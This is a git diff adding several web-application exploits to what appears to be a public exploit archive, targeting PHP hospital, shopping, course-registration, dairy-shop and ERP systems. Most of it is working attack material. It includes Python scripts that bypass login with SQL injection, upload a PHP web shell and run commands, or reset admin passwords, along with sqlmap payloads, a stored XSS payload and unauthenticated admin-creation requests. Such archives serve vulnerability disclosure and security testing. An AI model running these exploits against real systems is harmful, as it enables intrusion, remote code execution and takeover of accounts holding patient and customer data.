+                    "email" : self.email,
+                    "nonce" : self.nonce
+            })
+            if resp.status_code == 200:
+                print("Exploit Successful, Use the Cookies to Login: \n{}".format(
+                    json.dumps(self.sess.cookies.get_dict(), indent=4)
+                ))
+        except Exception as e:
+            print("Auth Bypass Error: {}".format(e))
+
+    def begin_exploit(self):
+        self.get_nonce()
+        if self.nonce:
+            print("Found Nonce: {}".format(self.nonce))
+            self.auth_bypass()
+        else:
+            print("Failed to Gather Nonce")
+
+if __name__ == "__main__":
+    print(banner)
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
+    parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
+    args = parser.parse_args()
+    ex = exploit(args.url, args.email)
+    ex.begin_exploit()
\ No newline at end of file
diff --git a/exploits/php/webapps/47834.py b/exploits/php/webapps/47834.py
new file mode 100755
index 000000000..0399ce282
--- /dev/null
+++ b/exploits/php/webapps/47834.py
@@ -0,0 +1,79 @@
+# Exploit Title: Shopping Portal ProVersion 3.0 - Authentication Bypass
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/shopping-portal-free-download/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+# Password and username parameters have sql injection vulnerability on admin panel.
+# username: joke' or '1'='1'# , password: joke' or '1'='1'#
+# Also, there isn't any restriction for malicious file uploading in the "Insert Product" section.
+# This two vulnerabilities occur unauthenticated remote command execution.
+
+#!/usr/bin/python
+
+import requests
+import sys
+import urllib                          
+
+if (len(sys.argv) !=3) or sys.argv[1] == "-h":
+	print "[*] Usage: PoC.py rhost/rpath command"
+	print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig"
+	exit(0) 
+
+rhost = sys.argv[1]
+
+command = sys.argv[2]
+
+
+
+url = "http://"+rhost+"/admin/index.php"
+data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+	#login
+
+	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	print ("[*] Status code for login: %s"%lg.status_code)
+	if lg.status_code != 200:
+		print ("One bad day! Check web application path!")
+		sys.exit()
+
+	#upload file
+
+	files = {'productimage1': ('command.php', '<?php system($_GET["cmd"]); ?>'), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')}
+	fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah<br>", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""}
+	
+	furl = "http://"+rhost+"/admin/insert-product.php"
+	fupload = session.post(url=furl, files=files, data=fdata)
+	print ("[*] Status code for file uploading: %s"%fupload.status_code)
+	
+	if fupload.status_code != 200:
+		print ("One bad day! File didn't upload.")
+		sys.exit()
+	dir = 0
+	dirr = str(dir)
+	
+	#find uploaded file
+
+	while True:
+		el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php")	
+
+		if el.status_code == 200:
+			
+			print "File Found!"
+			print "Put On A Happy Face!\r\n\r\n"
+
+			print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command))
+			break
+		else:			
+			print "trying to find uploaded file..."
+
+		dir += 1
+		dirr = str(dir)
+
+#exec
+final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command)
+print final.text
\ No newline at end of file
diff --git a/exploits/php/webapps/47836.py b/exploits/php/webapps/47836.py
new file mode 100755
index 000000000..81ab89430
--- /dev/null
+++ b/exploits/php/webapps/47836.py
@@ -0,0 +1,116 @@
+# Exploit Title: Hospital Management System 4.0 - Authentication Bypass
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+# Password and username parameters have sql injection vulnerability on admin panel.
+# username: joke' or '1'='1 , password: joke' or '1'='1
+# Exploit changes password of admin user.
+
+
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+
+if (len(sys.argv) !=2) or sys.argv[1] == "-h":
+print "[*] Usage: PoC.py rhost/rpath"
+print "[*] e.g.: PoC.py 127.0.0.1/hospital"
+exit(0)
+
+rhost = sys.argv[1]
+
+npasswd = str(raw_input("Please enter at least six characters for new password: "))
+
+url = "http://"+rhost+"/hms/admin/index.php"
+data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""}
+
+
+#login
+
+with requests.Session() as session:
+lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+#check authentication bypass
+
+check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
+print ("[*] Status code: %s"%check.status_code)
+
+if check.status_code == 200:
+print "[+] Authentication bypass was successful!"
+print "[+] Trying to change password."
+elif check.status_code == 404:
+print "[-] One bad day! Check target web application path."
+sys.exit()
+else:
+print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
+sys.exit()
+
+#change password
+
+cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
+cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+if cgpasswd.status_code == 200:
+print ("[+] Username is: admin")
+  print ("[+] New password is: %s"%npasswd)
+        else:
+print "[-] One bad day! Try it manually."
+sys.exit()
+
+hospital_poc.py
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+
+if (len(sys.argv) !=2) or sys.argv[1] == "-h":
+	print "[*] Usage: PoC.py rhost/rpath"
+	print "[*] e.g.: PoC.py 127.0.0.1/hospital"
+	exit(0) 
+
+rhost = sys.argv[1]
+
+npasswd = str(raw_input("Please enter at least six characters for new password: "))
+
+url = "http://"+rhost+"/hms/admin/index.php"
+data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} 
+
+
+#login
+
+with requests.Session() as session:
+	lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	
+	#check authentication bypass
+
+	check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False)
+	print ("[*] Status code: %s"%check.status_code)
+
+	if check.status_code == 200:
+		print "[+] Authentication bypass was successful!"
+		print "[+] Trying to change password."
+	elif check.status_code == 404:
+		print "[-] One bad day! Check target web application path."
+		sys.exit()
+	else:
+		print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually."
+		sys.exit()
+	
+	#change password
+
+	cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""}
+	cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	if cgpasswd.status_code == 200:
+		print ("[+] Username is: admin")
+  		print ("[+] New password is: %s"%npasswd)
+        else:
+		print "[-] One bad day! Try it manually."
+		sys.exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/47840.txt b/exploits/php/webapps/47840.txt
new file mode 100644
index 000000000..533a9b093
--- /dev/null
+++ b/exploits/php/webapps/47840.txt
@@ -0,0 +1,166 @@
+# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Tested on: Windows
+# CVE : CVE-2020-5192
+
+# The Hospital Management System 4.0 web application is vulnerable to
+# SQL injection in multiple areas, listed below are 5 of the prominent
+# and easy to exploit areas.
+
+================================ 1 - SQLi ================================
+
+POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+Origin: https://10.0.0.214
+DNT: 1
+Connection: close
+Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+
+searchdata=&search=
+
+?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.
+
+POST parameter 'searchdata' is vulnerable.
+sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
+---
+Parameter: searchdata (POST)
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 11 columns
+    Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
+---
+[15:49:58] [INFO] testing MySQL
+[15:49:58] [INFO] confirming MySQL
+[15:49:58] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.4.1
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+[15:49:58] [INFO] fetching database names
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+================================ 2 - SQLi ================================
+
+GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
+sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
+---
+Parameter: viewid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 11 columns
+    Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
+
+[15:54:21] [INFO] fetching database names
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login
+
+================================ 3 - SQLi ================================
+
+Parameter: bs (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=
+
+?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient
+
+================================ 4 - SQLi ================================
+
+POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 111
+Origin: https://10.0.0.214
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+
+patname=
+
+patname parameter is vulnerable to SQLi under the add patient in the doctor login
+
+================================ 5 - SQLi ================================
+
+---
+Parameter: cpass (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
+---
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 38
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
+Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
+Upgrade-Insecure-Requests: 1
+
+cpass=123&npass=123&cfpass=123&submit=123
+
+the ?cpass parameter is vulnerable to blind SQL injection
\ No newline at end of file
diff --git a/exploits/php/webapps/47841.txt b/exploits/php/webapps/47841.txt
new file mode 100644
index 000000000..6462ee4e2
--- /dev/null
+++ b/exploits/php/webapps/47841.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Tested on: Windows
+# CVE : CVE-2020-5191
+
+================ 1. - Cross Site Scripting (Persistent) ================
+
+URL  :  http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
+Method   :  POST
+Parameter:  doctorspecilization
+Attack   : </td><script>alert("XSS");</script><td>
+
+POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
+
+?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
\ No newline at end of file
diff --git a/exploits/php/webapps/47842.txt b/exploits/php/webapps/47842.txt
new file mode 100644
index 000000000..ac809958a
--- /dev/null
+++ b/exploits/php/webapps/47842.txt
@@ -0,0 +1,30 @@
+# Exploit Title: BloodX 1.0 - Authentication Bypass
+# Author: riamloo
+# Date: 2019-12-31
+# Vendor Homepage: https://github.com/diveshlunker/BloodX
+# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Discription:
+# An standalone platform which lets donors, receivers, organizers and sponsers to merge.
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost//BloodX-master/login.php
+
+POST /BloodX-master/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 63
+Referer: http://localhost/BloodX-master/login.php
+Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
\ No newline at end of file
diff --git a/exploits/php/webapps/47843.txt b/exploits/php/webapps/47843.txt
new file mode 100644
index 000000000..8d04c4a9b
--- /dev/null
+++ b/exploits/php/webapps/47843.txt
@@ -0,0 +1,145 @@
+# Exploit Title: Online Course Registration 2.0 - Remote Code Execution
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-course-registration-free-download/
+# Version: v2.0
+# Category: Webapps
+# Tested on: Xampp for Windows
+
+# Description:
+Attacker can bypass login page and access to student change password dashboard.
+
+PoC Request (Authentication Bypass):
+
+POST /onlinecourse/index.php HTTP/1.1
+Host: target
+
+regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit=
+
+
+There isn't any file extension control in student panel "My Profile" section.
+An unauthorized user can upload php file as profile image.
+
+First PoC Request (RCE):
+
+POST /onlinecourse/my-profile.php HTTP/1.1
+Host: target
+
+-----------------------------16046344889164047791563222514
+Content-Disposition: form-data; name="photo"; filename="simple.php"
+Content-Type: application/x-php
+
+<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>
+
+
+Second PoC Request (RCE):
+
+GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1
+Host: target
+
+
+Below basic python script will bypass authentication and execute command on target server.
+
+
+
+
+
+import requests
+import sys                        
+
+if (len(sys.argv) !=3) or sys.argv[1] == "-h":
+print "[*] Usage: PoC.py rhost/rpath "
+print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
+exit(0)
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+
+
+url = "http://"+rhost+"/index.php"
+data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+#bypass authentication
+lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+
+#check authentication bypass
+check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
+if check.status_code == 200:
+print "[+] Authentication bypass was successfull"
+else:
+print "[-] Authentication bypass was unsuccessful"
+sys.exit()
+
+#upload simple php file
+
+files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
+fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
+furl = "http://"+rhost+"/my-profile.php"
+session.post(url=furl, files= files, data=fdata)
+
+#execution
+final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)
+
+#check execution
+if final.status_code == 200:
+print "[+] Command execution completed successfully."
+print "\tPut on a happy face!\n"
+else:
+print "[-] Command execution was unsuccessful."
+sys.exit()
+
+print final.text
+
+online-course-registration-rce.png
+
+poc.py
+
+import requests
+import sys                         
+
+if (len(sys.argv) !=3) or sys.argv[1] == "-h":
+	print "[*] Usage: PoC.py rhost/rpath "
+	print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
+	exit(0) 
+
+rhost = sys.argv[1]
+command = sys.argv[2]
+
+
+
+url = "http://"+rhost+"/index.php"
+data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
+
+with requests.Session() as session:
+	#bypass authentication
+	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
+	
+	#check authentication bypass
+	check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
+	if check.status_code == 200:
+		print "[+] Authentication bypass was successfull"
+	else:
+		print "[-] Authentication bypass was unsuccessful"
+		sys.exit()	 
+
+	#upload simple php file
+
+	files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
+	fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
+	furl = "http://"+rhost+"/my-profile.php"
+	session.post(url=furl, files= files, data=fdata)
+	
+	#execution
+	final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)
+
+	#check execution
+	if final.status_code == 200:
+		print "[+] Command execution completed successfully.\n"
+		print "\tPut on a happy face!\n"
+	else:
+		print "[-] Command execution was unsuccessful."
+		sys.exit()
+
+	print final.text
\ No newline at end of file
diff --git a/exploits/php/webapps/47844.txt b/exploits/php/webapps/47844.txt
new file mode 100644
index 000000000..8a252fa9e
--- /dev/null
+++ b/exploits/php/webapps/47844.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection
+# Discovery Date: 2019-09-20
+# Exploit Author: Hakan TAŞKÖPRÜ
+# Vendor Homepage: http://karakuzu.info/
+# Effected Version <= 5.7.0
+
+Vulnerability #1: Unauthenticated SQL Injection
+==================================================
+
+Type: Error-based
+Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
+Payload: k_adi_duz=USERNAME' WHERE 4964=4964 AND
+1355=CTXSYS.DRITHSX.SN(1355,(CHR(113)||CHR(118)||CHR(118)||CHR(113)||CHR(113)||(SELECT
+(CASE WHEN (1355=1355) THEN 1 ELSE 0 END) FROM
+DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(118)||CHR(113)))--
+DhDH&k_yetki_duz=USER&kullanici_duzenle=
+
+Type: Time-based blind
+Title: Oracle AND time-based blind
+Payload: k_adi_duz=USERNAME' WHERE 8074=8074 AND
+6437=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(90)||CHR(65)||CHR(88),5)--
+VuHD&k_yetki_duz=USER&kullanici_duzenle=
+
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+k_adi_duz=[HERE]&k_email_duz=[HERE]&k_grup_duz=[HERE]&k_yetki_duz=[HERE]&k_sifre_duz=[HERE]&kullanici_duzenle=
+Description: k_adi_duz, k_email_duz, k_grup_duz, k_yetki_duz and
+k_sifre_duz parameters are injectable/vulnerable.
+
+Vulnerability #2: Unauthenticated Stored Cross Site Scripting in User
+Management Panel
+=======================================================================================
+Description : An attacker can stole an admin’s cookie.
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+k_adi=VULN_USERNAME&k_email=VULN+EMAIL" onfocus="alert(1)"
+autofocus="&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=
+
+Vulnerability #3: Unauthenticated Creating Admin User
+======================================================
+Description : An attacker can create an admin or normal account.
+
+Request:
+
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+k_adi=VULN_USERNAME&k_email=VULN+EMAIL&k_grup=TEST&k_yetki=ROOT&k_sifre=PASSWORD&kullanici_kayit=
+
+Vulnerability #4: Unauthenticated Deleting User
+=============================================
+Description : An attacker can delete an admin or normal account.
+
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+kullanici_sil=k_adi_duz=USERNAME_TO_DELETE
+
+Vulnerability #5: Unauthenticated Editing User
+===============================================
+Description : An attacker can change a user’s password or role(e.g ROOT).
+POST /TARGET_PATH/netting/islem2.php HTTP/1.1
+Host: TARGET
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+k_adi_duz=USERNAME&k_email_duz=VULN+MAIL&k_grup_duz=GROUP&k_yetki_duz=ROOT&k_sifre_duz=NEW_PASSWORD&kullanici_duzenle=
+
+### History
+=============
+2019-09-20  Issue discovered
+2019-11-19  Vendor contacted (No response)
+2020-01-03  Issue published
\ No newline at end of file
diff --git a/exploits/php/webapps/47846.txt b/exploits/php/webapps/47846.txt
new file mode 100644
index 000000000..42c8beaed
--- /dev/null
+++ b/exploits/php/webapps/47846.txt
@@ -0,0 +1,164 @@
+# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-03
+# Exploit Author: Chris Inzinga
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows
+# CVE: N/A
+
+# The Dairy Farm Shop Management System 1.0 web application is vulnerable to 
+# SQL injection in multiple areas. The most severe of these is the username 
+# parameter on the login page as this injection can be done unauthenticated.
+
+
+================================ 'username' - SQLi ================================
+
+POST /dfsms/index.php HTTP/1.1
+Host: 192.168.0.33
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.33/dfsms/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+Connection: close
+Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
+Upgrade-Insecure-Requests: 1
+
+username=test&password=test&login=
+
+---
+Parameter: username (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'category' & 'categorycode' - SQLi ================================
+
+POST /dfsms/add-category.php HTTP/1.1
+Host: 192.168.0.33
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.33/dfsms/add-category.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 39
+Connection: close
+Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
+Upgrade-Insecure-Requests: 1
+
+category=test&categorycode=test&submit=
+
+---
+Parameter: category (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+---
+Parameter: categorycode (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'companyname' - SQLi ================================
+
+---
+Parameter: companyname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'productname' & 'productprice' - SQLi ================================
+
+---
+Parameter: productname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=
+---
+---
+Parameter: productprice (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=
+---
+[INFO] the back-end DBMS is MySQL
+back-end DBMS: MySQL >= 5.0.12
+
+
+
+================================ 'fromdate' & 'todate' - SQLi ================================
+
+---
+Parameter: todate (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
